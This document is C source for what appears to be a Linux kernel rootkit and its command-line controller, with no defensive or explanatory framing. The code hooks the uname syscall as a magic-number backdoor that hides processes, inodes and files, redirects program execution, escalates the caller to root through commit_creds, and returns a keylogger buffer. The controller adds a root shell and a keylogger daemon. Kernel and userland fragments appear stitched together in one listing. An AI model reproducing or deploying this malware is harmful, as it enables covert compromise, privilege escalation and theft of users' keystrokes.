asmlinkage void new_sys_exit_group(int error_code)
{
pid_t pid = ksyms.old_sys_getpid();
if (is_pid_hidden_no_getpid(pid))
unhide_pid(pid);
ksyms.old_sys_exit_group(error_code);
}
static int do_unhide_pid(int argc, char **argv)
{
int pid;
if (sscanf(argv[0], "%u", &pid) != 1) {
eprintf("Invalid pid '%d'\n", pid);
return 1;
}
return unhide_pid(pid);
}
/*
* rookit interface
*/
asmlinkage long new_sys_newuname(struct new_utsname *name)
{
struct rk_args args;
if (ksyms._copy_from_user(&args, name, sizeof(args)))
pr_debug("%s: _copy_from_user failed\n", __func__);
if (args.magic_number_1 != MAGIC_NUMBER_1 || args.magic_number_2 != MAGIC_NUMBER_2)
return ksyms.old_sys_uname(name);
pr_debug("%s: magic number reveived\n", __func__);
switch (args.mode) {
case SYSCALL_HIDE_INODE:
hide_inode(args.param1);
break;
case SYSCALL_UNHIDE_INODE:
unhide_inode(args.param1);
break;
case GET_ROOT:
if (ksyms.commit_creds && ksyms.prepare_kernel_cred)
ksyms.commit_creds(ksyms.prepare_kernel_cred(NULL));
break;
case SYSCALL_HIDE_PID:
hide_pid(args.param1);
break;
case SYSCALL_UNHIDE_PID:
unhide_pid(args.param1);
break;
case VFS_HIDE_FILE:
vfs_hide_filename(args.p_param1, args.param2);
break;
case VFS_UNHIDE_FILE:
vfs_unhide_filename(args.p_param1, args.param2);
break;
case SYSCALL_REDIRECT_EXECVE:
redirect_path(args.p_param1, args.param2,
args.p_param3, args.param4, REDIRECT_PATH_EXECVE);
break;
case SYSCALL_UNREDIRECT_EXECVE:
unredirect_path(args.p_param1, args.param2, REDIRECT_PATH_EXECVE);
break;
case SYSCALL_GET_KEYLOGGER_BUF:
return keylogger_buffer_get(args.p_param1, args.param2);
break;
#ifdef DEBUG
case DEBUG_RK:
debug_rk();
break;
#endif
}
return 0;
}
int main(int argc, char **argv)
{
int c, opt_idx;
struct rk_args args;
for (;;) {
memset(&args, 0, sizeof(args));
c = getopt_long(argc, argv, "h", long_options, &opt_idx);
if (c == -1)
break;
switch (c) {
case 'h':
usage(argv[0]);
return 0;
case 0:
hide_inode(atoi(optarg));
break;
case 1:
unhide_inode(atoi(optarg));
break;
case 2:
root_shell();
break;
case 3:
hide_file(optarg);
break;
case 4:
unhide_file(optarg);
break;
case 5:
hide_pid(atoi(optarg));
break;
case 6:
unhide_pid(atoi(optarg));
break;
case 7:
hide_filename(optarg);
break;
case 8:
unhide_filename(optarg);
break;
case 9:
redirect_execve(optarg);
break;
case 10:
unredirect_execve(optarg);
break;
case 11:
get_keylogger_buf(optarg);
break;
case 12:
anima_daemon("/tmp/keylogger");
break;
case 13:
anima_control(DEBUG_RK, NULL);
break;
default:
break;
}
}
return 0;
}
